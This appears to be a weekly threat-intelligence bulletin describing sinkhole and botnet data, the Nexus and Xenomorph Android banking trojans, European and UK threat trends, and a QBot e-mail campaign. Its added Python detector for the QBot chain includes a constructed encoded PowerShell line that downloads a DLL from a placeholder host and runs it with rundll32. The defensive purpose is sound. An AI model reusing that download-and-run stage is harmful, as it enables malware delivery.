Activity Summary - Week Ending on 20 April 2023:
- Red Sky Alliance identified 29,549 connections from new IPs checking in with our Sinkholes
- Descapital[.]com in the US hit 397x
- 22 ‘new’ Botnets hits
- Dark Web Forum Instruction
- Nexus & Xenomorph Android Banking Trojans
- EU Main and Emerging Threats
- UK & RU
- Qbot in Italy
Red Sky Alliance Compromised (C2) IPs
| IP | Contacts |
| --- | --- |
| 37.139.128.91 | 161 |
| 45.92.1.143 | 84 |
| 4.188.235.26 | 71 |
| 104.244.74.6 | 71 |
| 51.15.131.129 | 68 |
37.139.128.91 was reported 397 times. Confidence of Abuse is 59%. ISP: Des Capital B.V.; Usage Type: Data Center/Web Hosting/Transit; Domain Name: des.capital; Country: USA; City: Dallas, Texas
On 19 April 2023, Red Sky Alliance identified 29,549 connections from new unique IP addresses, which are checking in with one of the many Red Sky Alliance sinkholed domains.
Top 5 malware variants and number of contacts. Sality and Corkow have consistently remained the top variants.
Red Sky Alliance Malware Activity
| Malware Variant | Times Seen |
| --- | --- |
| sality | 26048 |
| corkow | 1777 |
| sykipot | 601 |
| shiz | 537 |
| betabot | 389 |
For a full black list – contact analysts: info@redskyalliance.com
Red Sky Alliance Botnet Tracker
On 19 April 2023, analysts identified 22 new IP addresses participating in various botnets (contact us for the full .csv blacklists; below is only a small sampling of botnet trackers). We are currently upgrading this collection.
| First Seen | Botnet Attribution | Infected Host’s IPv4 Address |
| --- | --- | --- |
| 2023-04-13T19:08:55 | SOCKS4 proxy, port 10801 | 14.232.161.29 |
| 2023-04-12T13:08:12 | HTTP proxy, port 83 | 43.243.172.2 |
| 2023-04-12T19:08:17 | HTTP proxy, port 999 | 45.174.251.1 |
| 2023-04-13T10:02:44 | SOCKS4 proxy, port 443 | 49.51.98.75 |
| 2023-04-12T19:09:11 | SOCKS4 proxy, port 24388 | 58.214.88.130 |
Red Sky Alliance Dark Web Data / Last 6 Months
Darkweb Data - Darkweb data is collected from a variety of pages on the Tor network and their plain-web mirrored counterparts, or from plain-web forums with overlapping intent. This includes forums, ransomware listings, and marketplaces. The data found there is broad: it contains companies already breached, various login credentials (personal and business), and a variety of software, identification papers, and counterfeit items for sale.
Below is an example from several forum sites: instructions on how to handle stolen credit card numbers. Stolen credit cards (BINs) are sold daily on the Dark Web; once the data is purchased, the buyer needs instructions on how to use the stolen information.
MALICIOUS CYBER TRENDS:
Nexus & Xenomorph Android Banking Trojans: CFTR-2023-04-0003 - Banking Trojans are malicious software that steal sensitive financial information from users’ computers, smartphones, or tablets. They pose a serious threat to individuals, businesses, and financial institutions. In this report, the Cyber-Fraud Threat Intelligence Unit (CFTIU) focuses on two Android Banking Trojans, Nexus and Xenomorph, examining their characteristics, capabilities, and indicators of compromise.[1]
Nexus - In early 2023, criminal actors updated Nexus, a sophisticated Android banking Trojan. Attackers distribute the malware through phishing emails, malicious websites, and fake apps. Upon installation on a victim’s device, Nexus disguises itself as a legitimate app and conceals its presence. The Trojan then waits for the user to open a banking app or access a financial website. When the user enters login credentials, Nexus intercepts and steals the information.
Capabilities:
- Keylogging: Nexus captures every keystroke made by the victim, including passwords and other sensitive information.
- Screenshot capture: Nexus takes screenshots of the victim’s device, allowing the attacker to see everything happening on the screen.
- Overlay attacks: Nexus creates a fake login screen that overlays the legitimate app. When the victim enters credentials, the attacker receives the information.
Indicators of Compromise (IOCs), by indicator type:
- IPv4 193.42.32.84
- IPv4 193.42.32.87
- FileHash-MD5 d4c6871dbd078685cb138a499113d280
- FileHash-SHA1 60b64c8481f9de5b92634efc70a9ff42f451c78f
- FileHash-SHA256 376d13affcbfc5d5358d39aba16b814f711f2e81632059a4bce5af060e038ea4
Source for the Nexus section: “Nexus: a new Android botnet?” Cleafy Threat Intelligence, 21 March 2023, https://www.cleafy.com/cleafy-labs/nexus-a-newandroid-botnet
Xenomorph - Xenomorph is a relatively new Android banking Trojan that surfaced in 2021. Attackers distribute it through malicious apps usually downloaded from third-party app stores. Once installed on a victim’s device, Xenomorph requests extensive permissions, including the ability to read and send SMS messages and make phone calls. This enables the Trojan to intercept multi-factor authentication (MFA) codes and make unauthorized transactions.
Capabilities:
- Intercepting SMS messages: Xenomorph intercepts SMS messages containing one-time passwords (OTPs) and other sensitive information.
- Overlay attacks: Xenomorph creates a fake login screen that overlays the legitimate app. When the victim enters credentials, the attacker receives the information.
- RAT functionality: Xenomorph has Remote Access Trojan (RAT) functionality, enabling the attacker to remotely control the victim’s device.
- Automated Transfer System (ATS) framework enabling the malware to perform automated:
  - Extraction of account credentials
  - Harvesting of 2FA/MFA text messages and tokens from authenticator applications
  - Account balance inquiries
  - Fund transfers
Indicators of Compromise (IOCs): the full list of file hashes (MD5/SHA1/SHA256), domains and hostnames is given in the USSS Cyber-Fraud Threat Report 2023-04-0003 [1].
Additional Information for Investigators:
Nexus and Xenomorph are both sophisticated Malware-as-a-Service (MaaS) offerings capable of stealing sensitive financial information from victims. It is crucial that users take precautions to protect their devices from these threats. Users should only download apps from trusted sources, keep their devices up to date with the latest security patches, and use MFA whenever possible. By taking these steps, users can help protect themselves from becoming victims of banking Trojans.
If there are additional questions or concerns related to Nexus, Xenomorph, or other banking trojans, please contact the CFTIU at USSS.CFTIU@usss.dhs.gov
GLOBAL TRENDS:
EU Main and Emerging Threats -
1. Ransomware: hackers seize control of someone’s data and demand a ransom to restore access - In 2022, ransomware attacks continued to be one of the main cyberthreats. They are also getting more complex. According to a survey quoted by Enisa that was conducted at the end of 2021 and in 2022, over half of respondents or their employees had been approached in ransomware attacks. Data quoted by the EU Agency for Cybersecurity shows that the highest ransomware demand grew from €13 million in 2019 to €62 million in 2021 and the average ransom paid doubled from €71,000 in 2019 to €150,000 in 2020. It is estimated that in 2021 global ransomware reached €18 billion worth of damages – 57 times more than in 2015.[2]
2. Malware: software that harms a system - Malware includes viruses, worms, Trojan horses and spyware. After a global decrease in malware linked to the Covid-19 pandemic in 2020 and early 2021, its use increased heavily by the end of 2021, as people started returning to the office. The rise of malware is also attributed to crypto-jacking (the secret use of a victim’s computer to create cryptocurrency illegally) and Internet-of-Things malware (malware targeting devices connected to the internet such as routers or cameras). According to Enisa, there were more Internet-of-Things attacks in the first six months of 2022 than in the previous four years.
3. Social engineering threats: exploiting human error to gain access to information or services - Tricking victims into opening malicious documents, files or emails, visiting websites and thus granting unauthorized access to systems or services. The most common attack of this sort is phishing (through email) or smishing (through text messages). Almost 60% of the breaches in Europe, the Middle East and Africa include a social engineering component, according to research quoted by Enisa. The top organizations impersonated by phishers were from the financial and technology sectors. Criminals are also increasingly targeting crypto exchanges and cryptocurrency owners.
4. Threats against data: targeting sources of data to get unauthorized access and disclosure - We live in a data-driven economy, producing huge amounts of data that are extremely important for, among others, enterprises and Artificial Intelligence, which makes it a major target for cybercriminals. Threats against data can be mainly classified as data breaches (intentional attacks by a cybercriminal) and data leaks (unintentional releases of data). Money remains the most common motivation of such attacks. Only in 10% of cases is espionage the motive.
5. Threats against availability - Denial of Service: attacks preventing users from accessing data or services - These are some of the most critical threats to IT systems. They are increasing in scope and complexity. One common form of attack is to overload the network infrastructure and make a system unavailable. Denial of Service attacks are increasingly hitting mobile networks and connected devices. They are used a lot in Russia-Ukraine cyberwarfare. Covid-19 related websites, such as those for vaccination, have also been targeted.
6. Threats against availability: threats to the availability of the internet - These include physical take-over and destruction of internet infrastructure, as seen in occupied Ukrainian territories since the invasion, as well as the active censoring of news or social media websites.
7. Disinformation/misinformation: the spread of misleading information - The increasing use of social media platforms and online media has led to a rise in campaigns spreading disinformation (purposefully falsified information) and misinformation (sharing wrong data). The aim is to cause fear and uncertainty. Russia has used this technology to target perceptions of the war. Deepfake technology means it is now possible to generate fake audio, video or images that are almost indistinguishable from real ones. Bots pretending to be real people can disrupt online communities by flooding them with fake comments.
8. Supply-chain attacks: targeting the relationship between organizations and suppliers - This is a combination of two attacks - on the supplier and on the customer. Organizations are becoming more vulnerable to such attacks, because of increasingly complex systems and a multitude of suppliers, which are harder to oversee.
UK & RU - Russian hackers are now focusing their efforts to ‘disrupt or destroy’ British power networks say government officials. On 19 April UK Cabinet Minister Oliver Dowden will brief a cyber conference on a ‘new class’ of Russian cyber-criminal, bent on crippling Britain’s infrastructure. Following the effectiveness of cyber-attacks in Ukraine in which the national power grid was taken down, and nuclear power plants and satellite communications were disrupted, pro-Putin groups are now targeting the UK.[3]
At the CyberUK Conference in Belfast, Mr. Dowden will outline how companies that are responsible for ‘keeping the lights on,’ will be subject to unrestrained cyber-attacks. An official statement is expected today from the UK’s National Cyber Security Centre (NCSC), warning vital national infrastructure operators that they face an unpredictable ‘new class of Russian cyber adversary’ whose mission is to cause chaos for the British people. The conference will also discuss how the Wagner group and other Kremlin allies are mounting what could be devastating attacks to ‘disrupt or destroy’ key industries such as energy and utilities, essential to keep the country running.
Bridewell, a cyber security specialist company, reported a 50% rise in ransomware threats against UK infrastructure in 2022. Since Russia’s invasion of Ukraine, seven in ten IT security staff across various sectors, including government and communications, transport, aviation, utilities, and finance, reported seeing a rise in cyber attacks.
The official threat notice from the NCSC indicates, “Over the past 18 months, a new class of Russian cyber adversary has emerged. These state-aligned groups are often sympathetic to Russia’s invasion and are ideologically, rather than financially, motivated. Although these groups can align to Russia’s perceived interests, they are often not subject to formal state control, and so their actions are less constrained and their targeting broader than traditional cybercrime actors. This makes them less predictable. We expect these groups to look for opportunities to create an impact, particularly if systems are poorly protected.” The UK’s Royal Mail was hit by a cyber-attack in January 2023, which was linked to Russia.
QBot in Italy - In early April 2023, Kaspersky detected a significant increase in attacks that use banking Trojans of the QBot family (aka QakBot, QuackBot, and Pinkslipbot). The malware is delivered through e-mail letters written in different languages; variants were seen in English, German, Italian, and French. The messages were based on real business letters the attackers had gained access to, which gave them the opportunity to join the correspondence thread with messages of their own. As a rule, such letters urge the addressee, under a plausible pretext, to open an enclosed PDF file, for example asking them to provide all the documentation pertaining to the attached application or to calculate the contract value based on the attached cost estimate.[4]
Figure: Example of a forwarded letter containing a malicious attachment
Such simulated business correspondence can obstruct spam tracking while increasing the probability of the victim falling for the trick. For authenticity, the attackers put the sender’s name from the previous letters in the ‘From’ field; however, the sender’s fraudulent e-mail address will be different from that of the real correspondent.
A short look at QBot - The banking Trojan QBot was first detected in 2007. Since then, it has gone through multiple modifications and improvements to become one of the most actively spread malware families in 2020. In 2021, Kaspersky published a detailed QBot technical analysis. The banker keeps getting new functions and module updates for increased effectiveness and profit. QBot distribution methods have also evolved: early on it was distributed through infected websites and pirated software; now the banker is delivered to potential victims through malware already residing on their computers, social engineering, and spam mailings.
The QBot malware delivery scheme begins with an e-mail letter with a PDF file in the attachment being sent. The document’s content imitates a Microsoft Office 365 or Microsoft Azure alert advising the user to click Open to view the attached files. If the user complies, an archive will be downloaded from a remote server (compromised site), protected with a password given in the original PDF file.
In the downloaded archive there is a .wsf (Windows Script File) file containing an obfuscated script written in JScript.
After the WSF file is deobfuscated its true payload gets revealed: a PowerShell script encoded into a Base64 line.
So, as soon as the user opens the WSF file from the archive, the PowerShell script is run discreetly on the computer and uses wget to download a DLL file from a remote server. The library’s name is an automatically generated alphabetic sequence varying from one victim to another.
The PowerShell script tries in succession to download the file from each of the URLs listed in the code. To determine whether a download attempt was successful, the script checks the file size using the Get-Item command. If the file size is 100,000 bytes or more, the script runs the DLL with the help of rundll32. Otherwise, it waits four seconds before attempting to download the library from the next link in the list. The downloaded library is the Trojan known as QBot (detected as Trojan-Banker.Win32.Qbot.aiex).
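As an added example (not from the Securelist write-up or from Red Sky Alliance), the following Python detection logic checks constructed process-creation records for the chain described above: a script host spawning PowerShell with an encoded command that downloads a DLL and runs it through rundll32, and rundll32 loading an alphabetic-named DLL from a Temp folder. The event fields, the URL and the DLL name are constructed placeholders.

```python
import base64
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent: str   # parent process image path
    image: str    # process image path
    cmdline: str  # full command line

# -e / -ec / -enc / -EncodedCommand followed by a Base64 blob
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# DLL with a purely alphabetic name under a Temp directory (the "generated alphabetic sequence")
TMP_DLL_RE = re.compile(r"\\temp\\[a-z]+\.dll\b", re.I)

def decode_encoded_command(cmdline):
    """Return the script carried by -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(ev):
    """Collect the indicators of the WSF -> PowerShell -> rundll32 chain present in one event."""
    hits = []
    parent, image = ev.parent.lower(), ev.image.lower()
    if parent.endswith(("wscript.exe", "cscript.exe")) and image.endswith("powershell.exe"):
        hits.append("script host spawned PowerShell")
    script = decode_encoded_command(ev.cmdline)
    if script is not None:
        hits.append("encoded PowerShell command")
        s = script.lower()
        if "wget " in s or "invoke-webrequest" in s:
            hits.append("download cradle in encoded script")
        if "rundll32" in s:
            hits.append("rundll32 launch in encoded script")
    if image.endswith("rundll32.exe") and TMP_DLL_RE.search(ev.cmdline):
        hits.append("rundll32 loading alphabetic-named DLL from Temp")
    return hits

def analyze(events):
    """Map event index -> indicators; an encoded command on its own is not flagged."""
    return {i: h for i, ev in enumerate(events)
            if (h := score_event(ev)) and h != ["encoded PowerShell command"]}

def encode_ps(script):
    """Encode a script the way -EncodedCommand expects (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample telemetry (not real events); URL and DLL name are placeholders.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
STAGE2 = "wget http://example.invalid/x -OutFile $env:TEMP\\qhzvbkal.dll; rundll32 $env:TEMP\\qhzvbkal.dll"
SAMPLE_EVENTS = [
    ProcEvent("C:\\Windows\\System32\\wscript.exe", PS, "powershell -nop -w hidden -enc " + encode_ps(STAGE2)),
    ProcEvent("C:\\Windows\\explorer.exe", PS, "powershell -enc " + encode_ps("Get-Date")),
    ProcEvent(PS, "C:\\Windows\\System32\\rundll32.exe", "rundll32 C:\\Users\\u\\AppData\\Local\\Temp\\qhzvbkal.dll"),
]
```

Running `analyze(SAMPLE_EVENTS)` flags the first and third events and leaves the benign encoded `Get-Date` alone; in production the same checks would run over Sysmon event ID 1 or EDR process-creation telemetry.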
Technical description of malicious DLL
Kaspersky analyzed Qbot samples from the current e-mail campaign. The bot’s configuration block features the company name “obama249” and the time stamp “1680763529” (corresponding to April 6, 2023 6:45:29), as well as over a hundred IP addresses the bot will use to connect to command servers. Most of these addresses belong to users whose infected systems provide an entry point into the chain used to redirect the botnet traffic to the real command servers.
Qbot’s functionality hardly changed in the past couple of years. As before, the bot is capable of extracting passwords and cookies from browsers, stealing letters from your mailbox, intercepting traffic, and giving operators remote access to the infected system. Depending on the value of the victim, additional malware can be downloaded locally, such as CobaltStrike (to spread the infection through the corporate network) or various ransomware. Or else the victim’s computer can be turned into a proxy server to facilitate redirection of traffic, including spam traffic.
Statistics – Kaspersky analyzed the QBot attack statistics collected using Kaspersky Security Network (KSN). According to Kaspersky’s data, the first letters with malicious PDF attachments began to arrive in the evening of 4 April 2023. The mass e-mail campaign began at 12:00 p.m. on the following day and continued until 9:00 p.m. During that time approximately 1,000 letters were detected. The second upsurge began on April 6, again at noon, with over 1,500 letters dispatched to Kaspersky customers this time. For the next few days new messages kept coming, and on the evening of 12 April researchers discovered another upsurge with 2,000 more letters. After that cybercriminal activity went down, but users still receive fraudulent messages.
Figure: Geography of Qbot family attacks, April 1–11, 2023
In addition, Kaspersky checked which countries were targeted by Qbot the most by relating the number of users attacked in a given country to the total number of users attacked worldwide. The banking Trojan QBot turned out to be a more common issue for residents of Germany (28.01%), Argentina (9.78%), and Italy (9.58%).
Qbot indicators of compromise (IOCs): the MD5 hashes of the PDF, ZIP, WSF and DLL files and the malicious download links are listed in the Securelist write-up [4].
[1] USSS Cyber-Fraud Threat Report 2023-04-0003
[2] https://www.eureporter.co/defence/cybercrime-2/2023/04/13/cybersecurity-main-and-emerging-threats-2/
[3] https://euroweeklynews.com/2023/04/19/massive-threat-to-britain-from-new-breed-of-russian-hackers/
[4] https://securelist.com/qbot-banker-business-correspondence/109535/